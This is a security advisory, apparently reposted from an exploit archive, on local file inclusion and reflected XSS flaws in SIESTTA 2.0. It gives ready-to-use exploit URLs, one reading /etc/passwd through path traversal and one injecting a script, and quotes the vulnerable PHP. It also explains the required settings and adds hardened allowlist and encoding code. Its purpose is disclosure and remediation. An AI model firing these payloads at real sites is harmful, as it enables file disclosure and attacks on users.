SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities

2010.05.06
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22
CWE-79

####################################################################
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
# download: http://ramoncastro.es/siestta_old/
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://www.hack0wn.com/
# team: Spanish Hackers Team - [SHT]
#
# Hack0wn Security Project!!
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
#
####################################################################
#
# Requires register_globals = On: login.php never reads $idioma from
# $_GET itself, so the LFI only works when PHP populates the variable
# from the query string. register_globals was removed in PHP 5.4, and
# the %00 truncation of the ".php"-less include path below stops
# working on PHP 5.3.4 and later, where a NUL byte makes the path
# invalid. Neither of those settings fixes the underlying bug: the
# include path is built from attacker-controlled data.
#
####################################################################

- [#LFI] <login.php>

    <?php
    require('idioma/'.$idioma.'');
    ...
    ?>

!EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00

- [#XSS] <carga_foto_al.php>

    <?
    ...
    $usuario = $_GET['usuario'];
    $imagen = 'admin/fotos_al/'.$usuario.'.jpg';
    echo '<p style="text-align:center;"> <img class="foto" src="'.$imagen.'" alt="'.$usuario.'" /></p>';
    ...
    ?>

!EXPLOIT: /carga_foto_al.php?usuario=<script>alert("JosS - Hack0wn");</script>

# The value is reflected twice, unencoded, inside double-quoted
# attributes. The first `"` in the payload closes the src attribute and
# the `>` of the first </script> closes the <img> tag, so the second
# copy (from alt) lands in text context and executes as a real script.

__h0__
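The following is an added example, not code from SIESTTA or from the advisory's author, showing how the two sinks above are normally hardened: the include path for login.php is resolved against a fixed allowlist instead of being concatenated from request data, and carga_foto_al.php validates the identifier (it is also used as a file name) and HTML-encodes every value echoed into markup. The language-file names under idioma/ (es.php, en.php) and the function names are assumptions for illustration; the real file names are not on the page.

```php
<?php
// Added example (not SIESTTA's own code). Assumed: language files live in
// idioma/ as es.php and en.php; the real SIESTTA file names are unknown.
declare(strict_types=1);

/**
 * Fix for the login.php LFI.
 *
 * User input never becomes part of the include path. The request value is
 * only used as a key into a fixed allowlist, so traversal sequences, NUL
 * bytes and stream wrappers are irrelevant: an unknown key falls back to
 * the default language. Reading $_GET explicitly also removes the
 * dependency on register_globals.
 */
function resolveLanguageFile($requested, string $baseDir = __DIR__ . '/idioma'): string
{
    // Assumed file names for the example.
    $allowed = ['es' => 'es.php', 'en' => 'en.php'];
    $default = 'es';

    $key = (is_string($requested) && isset($allowed[$requested])) ? $requested : $default;
    return $baseDir . '/' . $allowed[$key];
}

/** HTML-encode a value for use in element content or a quoted attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * Fix for the carga_foto_al.php XSS.
 *
 * The identifier is both an attribute value and a file name, so it is
 * validated against a strict pattern first (no slashes, dots, quotes or
 * angle brackets), and then every reflected value is encoded with h().
 * Encoding alone would stop the XSS; the pattern also keeps the path
 * under admin/fotos_al/ confined to that directory.
 */
function renderStudentPhoto($usuario): string
{
    if (!is_string($usuario) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $usuario)) {
        return '<p class="error">Invalid user.</p>';
    }

    $imagen = 'admin/fotos_al/' . $usuario . '.jpg';

    return '<p style="text-align:center;">'
        . '<img class="foto" src="' . h($imagen) . '" alt="' . h($usuario) . '" />'
        . '</p>';
}

// In the real pages the calls would be:
//   require resolveLanguageFile($_GET['idioma'] ?? null);
//   echo renderStudentPhoto($_GET['usuario'] ?? null);
//
// Stand-alone demonstration using the advisory's two payloads as constructed input.
if (PHP_SAPI === 'cli') {
    $lfiPayload = '/../../../../../../../../../../../etc/passwd' . "\0";
    echo resolveLanguageFile($lfiPayload), PHP_EOL;        // .../idioma/es.php (default)
    echo resolveLanguageFile('en'), PHP_EOL;               // .../idioma/en.php

    $xssPayload = '<script>alert("JosS - Hack0wn");</script>';
    echo renderStudentPhoto($xssPayload), PHP_EOL;         // rejected by the pattern
    echo renderStudentPhoto('juan_perez'), PHP_EOL;        // normal image markup
}
```

The allowlist approach is preferred over "sanitising" the path with str_replace or basename: the include target is chosen from data the application already trusts, so there is nothing for an encoding trick or a new PHP wrapper to get past. For the photo page, output encoding is the non-negotiable part; the identifier pattern is defence in depth for the file-name use of the same value.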

References:

http://xforce.iss.net/xforce/xfdb/57899
http://www.securityfocus.com/bid/39526
http://www.osvdb.org/63836
http://www.exploit-db.com/exploits/12260
http://secunia.com/advisories/39453
http://packetstormsecurity.org/1004-exploits/siestta-lfixss.txt

Copyright 2024, cxsecurity.com